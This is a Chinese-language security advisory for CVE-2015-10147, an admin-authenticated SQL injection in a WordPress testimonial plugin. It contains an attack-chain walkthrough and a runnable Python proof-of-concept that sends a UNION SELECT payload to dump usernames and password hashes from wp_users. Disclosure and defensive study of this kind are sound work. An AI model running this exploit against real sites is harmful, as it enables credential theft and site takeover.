CVE-2015-10147 WordPress Easy Testimonial插件SQL注入漏洞

漏洞信息

漏洞编号

CVE-2015-10147

漏洞类型

SQL注入

CVSS评分

4.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Easy Testimonial Slider and Form plugin for WordPress

漏洞概述

CVE-2015-10147是WordPress平台上一款名为Easy Testimonial Slider and Form的插件存在的严重安全漏洞。该漏洞为SQL注入类型，CVSS评分4.9，属于中危级别。漏洞影响该插件所有版本直至1.0.2版本。攻击者可利用该漏洞通过未充分过滤的用户输入参数（特别是id参数）注入恶意SQL代码。由于插件在处理用户提供的参数时缺乏足够的输入转义处理，且在构建SQL查询时没有采用参数化查询等安全最佳实践，导致攻击者能够突破原有的查询逻辑，追加任意SQL语句。成功利用此漏洞需要攻击者具备WordPress站点管理员级别或更高的访问权限。一旦攻击成功，攻击者可从数据库中提取敏感信息，包括但不限于用户凭据、个人数据、业务机密等。该漏洞由Wordfence安全团队的安全研究人员发现并报告，披露日期为2025年10月29日。由于该插件曾被广泛应用于各类WordPress网站，此漏洞可能影响大量使用该插件的网站。

技术细节

该SQL注入漏洞的根本原因在于Easy Testimonial Slider and Form插件在数据库查询处理过程中存在两处关键安全缺陷。首先，插件对用户可控的输入参数（特别是id参数）缺乏充分的输入验证和转义处理。攻击者可以通过构造特殊的SQL语句片段，利用单引号、双破折号等SQL元字符来破坏原有查询结构。其次，插件在构建SQL查询时直接拼接用户输入，而非使用参数化查询（Prepared Statements）或ORM框架提供的安全查询方法，导致恶意SQL代码被当作正常SQL指令执行。攻击者利用此漏洞可以执行UNION SELECT等SQL技术来枚举数据库内容，提取wp_users表中的用户名和密码哈希值，甚至可以利用MySQL的LOAD_FILE和INTO OUTFILE等函数读取系统文件或写入恶意代码。攻击者需要具有管理员权限才能利用此漏洞，但一旦成功，可完全控制整个WordPress网站及其底层数据库。

攻击链分析

STEP 1

信息收集

攻击者首先识别目标网站是否使用WordPress平台以及是否安装了Easy Testimonial Slider and Form插件，可通过网站指纹识别或插件目录扫描确认

STEP 2

获取管理员权限

攻击者需要获取WordPress站点的管理员级别账户，可通过钓鱼攻击、密码爆破、社工攻击或利用其他漏洞等方式获得有效凭据

STEP 3

构造恶意请求

使用管理员会话，攻击者向插件的AJAX端点发送包含SQL注入载荷的HTTP请求，载荷通常使用UNION技术来提取数据库中的敏感数据

STEP 4

执行SQL注入攻击

服务器端插件将恶意载荷拼接到SQL查询中执行，由于缺乏参数化查询和输入过滤，攻击者的SQL代码被数据库引擎成功执行

STEP 5

数据提取与利用

攻击者通过分析响应内容提取数据库中的敏感信息，如用户凭据、API密钥、业务数据等，进而可能实现横向移动或完全控制网站

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2015-10147 SQL Injection PoC
# Target: WordPress Easy Testimonial Slider and Form plugin <= 1.0.2
# Authentication required: Administrator or higher

def exploit_sql_injection(target_url, wp_username, wp_password, injection_payload):
    """
    Exploit SQL injection vulnerability in Easy Testimonial plugin
    
    Args:
        target_url: Base URL of the vulnerable WordPress site
        wp_username: WordPress administrator username
        wp_password: WordPress administrator password
        injection_payload: SQL injection payload to execute
    
    Returns:
        Response content or error message
    """
    # WordPress login endpoint
    login_url = f"{target_url}/wp-login.php"
    
    # Prepare login data
    login_data = {
        'log': wp_username,
        'pwd': wp_password,
        'wp-submit': 'Log In',
        'redirect_to': f"{target_url}/wp-admin/",
        'testcookie': '1'
    }
    
    # Create session
    session = requests.Session()
    
    try:
        # Authenticate to WordPress
        login_response = session.post(login_url, data=login_data, timeout=10)
        
        if 'wordpress_logged_in' not in session.cookies.get_dict():
            return "Authentication failed - check credentials"
        
        # Vulnerable endpoint - Easy Testimonial plugin
        vulnerable_url = f"{target_url}/wp-admin/admin-ajax.php"
        
        # Prepare malicious request with SQL injection payload
        exploit_data = {
            'action': 'get_testimonial',
            'id': injection_payload  # Vulnerable parameter
        }
        
        # Send exploit request
        exploit_response = session.post(vulnerable_url, data=exploit_data, timeout=10)
        
        return exploit_response.text
        
    except requests.RequestException as e:
        return f"Request failed: {str(e)}"

def extract_database_info(target_url, wp_username, wp_password):
    """
    Extract database information using UNION-based SQL injection
    """
    # Payload to extract WordPress users table
    union_payload = "1 UNION SELECT user_login,user_pass,3,4,5 FROM wp_users--"
    
    result = exploit_sql_injection(target_url, wp_username, wp_password, union_payload)
    return result

if __name__ == "__main__":
    if len(sys.argv) < 5:
        print("Usage: python cve_2015_10147_poc.py <target_url> <username> <password> <payload>")
        print("Example: python cve_2015_10147_poc.py http://example.com admin password '1 UNION SELECT...'")
        sys.exit(1)
    
    target = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    payload = sys.argv[4]
    
    print(f"[*] Targeting: {target}")
    print(f"[*] Authenticating as: {username}")
    print(f"[*] Sending payload: {payload}")
    
    result = exploit_sql_injection(target, username, password, payload)
    print("\n[+] Result:")
    print(result)

影响范围

Easy Testimonial Slider and Form plugin <= 1.0.2

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1）立即禁用并删除Easy Testimonial Slider and Form插件；2）使用WAF规则临时阻止对插件相关端点的访问；3）将WordPress管理员账户密码全部重置；4）启用WordPress的数据库表前缀功能增加攻击难度；5）限制管理员后台访问IP范围；6）启用WordPress的常量DISALLOW_FILE_EDIT防止通过后台编辑文件。建议尽快迁移到功能相似的安全插件替代品。